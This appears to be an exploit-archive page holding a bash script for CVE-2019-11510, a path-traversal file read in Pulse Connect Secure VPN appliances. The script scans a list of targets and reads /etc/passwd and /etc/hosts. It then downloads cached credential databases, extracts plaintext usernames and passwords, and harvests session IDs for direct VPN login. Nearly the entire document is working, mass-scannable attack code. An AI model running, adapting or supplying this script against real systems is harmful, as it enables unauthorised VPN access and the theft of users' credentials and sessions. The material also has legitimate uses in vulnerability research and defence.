Back

Exploit: Pulse Connect Secure 9.0R3 - RFR


#!/bin/bash
# Usage : cat targetlist.txt | bash CVE-2019-11510.sh     /   bash CVE-2019-11510.sh -d https://vpn.target.com/
# If you want to just verify the exploit and download /etc/passwd then use :  cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd     /   bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd 
# You must have binutils installed, install it by apt-get install binutils
# Release Date : 21/08/2019
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
echo "=================================================================================
 ___             _           _     ____                 ___           _  _       
| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _ 
|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
              |__/                                                 CVE-2019-11510 
================================================================================="
##############################
if [ ! -d "output" ]; then
  mkdir "output";
fi
##############################
while test $# -gt 0; do
           case "$1" in
                    -d)
                        shift
                        DOM=$1
                        shift
                        ;;
					--only-etc-passwd)
                        shift
                        VER="yes"
                        shift
                        ;;
                *)
                    break
                 ;;
          esac
  done
##############################
function checkexp {
UR=$1
URL=${UR%/}
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" > c.txt
RE=$(cat c.txt)
if [[ $RE == *"root:x:0:0:root"* ]]; then
  echo "$URL ---------------> Vulnerable"
  URLDOM=$(echo $URL | sed -e 's|^[^/]*//||' -e 's|/.*$||')
  if [ ! -d "output/$URLDOM" ]; then
    mkdir "output/$URLDOM";
  fi
  echo "Writing all files to output/$URLDOM/"
  echo Extracting /etc/passwd
  mv c.txt output/$URLDOM/etc_passwd
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/etc_passwd
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  if [ -z "$VER" ]; then
  echo Extracting /etc/hosts
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" > output/$URLDOM/etc_hosts
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/etc_hosts
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb
  echo Extracting Usernames and Passwords from /data/runtime/mtmp/lmdb/dataa/data.mdb
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb | strings > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | sed -z 's/\n/pzipzipzi/g' > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
  cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | grep "cn=" | cut -d ',' -f1 | cut -d '=' -f2 > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  while read -r line; do
	ST=$line"[email protected]"
    if grep -q $ST "output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod"; then	
	LI="s/.*"$line"[email protected]//;s/pzipzipzi.*//"
	PASW=$(cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod | sed -e $LI)
	echo "User : $line | Password : $PASW"
	echo "User : $line | Password : $PASW" >> output/$URLDOM/plaintext_user_pass.txt
	else
	echo "User : $line | Password not found."
	fi
	done < output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
	echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	rm output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
  echo "Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn"
  curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb
  cat output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb | strings | grep randomVal | cut -b 10- | sort -u > output/$URLDOM/sessionids.txt
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  cat output/$URLDOM/sessionids.txt
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fi
else
rm c.txt
echo "$URL ---------------> Not Vulnerable"
fi
}
##############################
if [ -z "$DOM" ]; then
  while read x
  do
checkexp $x
  done
else
checkexp $DOM
fi